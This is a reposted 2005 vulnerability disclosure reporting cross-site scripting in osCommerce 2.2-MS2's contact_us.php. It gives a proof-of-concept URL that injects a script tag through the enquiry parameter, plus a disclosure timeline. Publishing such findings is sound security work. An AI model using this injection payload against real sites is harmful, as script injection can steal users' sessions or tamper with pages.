Risks
Vulnerabilities
Browse by
osCommerce 2.2-MS2 Cross Site Scripting Vulnerability
16 February 2005
Bookmark and Share
From: "John Cobb" <johnc(at)nobytes.com>

Hello All,

I have discovered XSS vulnerability in: osCommerce 2.2-MS2

Authors Site: http://www.oscommerce.com/ [Example:]

XSS:

http://www.victimsite.com/contact_us.php?&name=1&email
=1&enquiry=%3C/textarea%3E%3Cscript%3Ealert('w00t');%3
C/script%3E

Result:

A nice pop up box.

[Notes:]

Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet

Regards

John Cobb

JohnC@NoBytes.com

http://www.nobytes.com


Spotlight

Fighting malware, emerging threats and AI

Posted on 24 November 2014.  |  Liran Tancman is the CEO of CyActive, a predictive cyber security company. In this interview he talks about fighting malware, emerging threats, artificial intelligence and the cloud.


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  

DON'T
MISS

Tue, Nov 25th
    COPYRIGHT 1998-2014 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //